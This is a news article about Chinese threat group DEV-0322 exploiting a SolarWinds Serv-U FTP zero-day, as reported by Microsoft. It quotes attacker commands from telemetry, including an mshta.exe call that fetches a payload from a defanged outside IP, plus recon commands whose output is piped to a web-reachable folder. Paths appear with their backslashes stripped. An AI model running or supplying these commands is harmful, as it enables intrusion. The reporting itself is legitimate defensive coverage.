China-based hackers known to target US defense and software companies are now targeting organizations using a vulnerability in the SolarWinds Serv-U FTP server.
Today, SolarWinds released a security update for a zero-day vulnerability in Serv-U FTP servers that allow remote code execution when SSH is enabled.
According to SolarWinds, this vulnerability was disclosed by Microsoft, who saw a threat actor actively exploiting it to execute commands on vulnerable customer’s devices.
Tonight, Microsoft revealed that the attacks are attributed with high confidence to a China-based threat group tracked as ‘DEV-0322.’
“This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure,” says a new blog post by the Microsoft Threat Intelligence Center.
Microsoft says the DEV-0322 hacking group has previously targeted entities in the US Defense Industrial Base Sector and software companies.
“The DIB Sector is the worldwide industrial complex that enables research and development (R&D), as well as design, production, delivery, and maintenance of military weapons systems, subsystems, and components or parts, to meet U.S. military requirements,” explains a CISA document describing the DIB sector.
Attacks detected by Microsoft 365 Defender telemetry
Microsoft says they first learned of the attacks after Microsoft 365 Defender telemetry showed a normally harmless Serv-U process spawning anomalous malicious processes.
Some of the commands executed through the remote code execution vulnerability are listed below.
C:WindowsSystem32mshta.exe http://144[.]34[.]179[.]162/a (defanged) cmd.exe /c whoami > “./Client/Common/redacted.txt” cmd.exe /c dir > “.ClientCommonredacted.txt” cmd.exe /c “”C:WindowsTempServ-U.bat”” powershell.exe C:WindowsTempServ-U.bat cmd.exe /c type \redactedredacted.Archive > “C:ProgramDataRhinoSoftServ-UUsersGlobal Usersredacted.Archive”
“We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U ClientCommon folder, which is accessible from the internet by default, so that the attackers…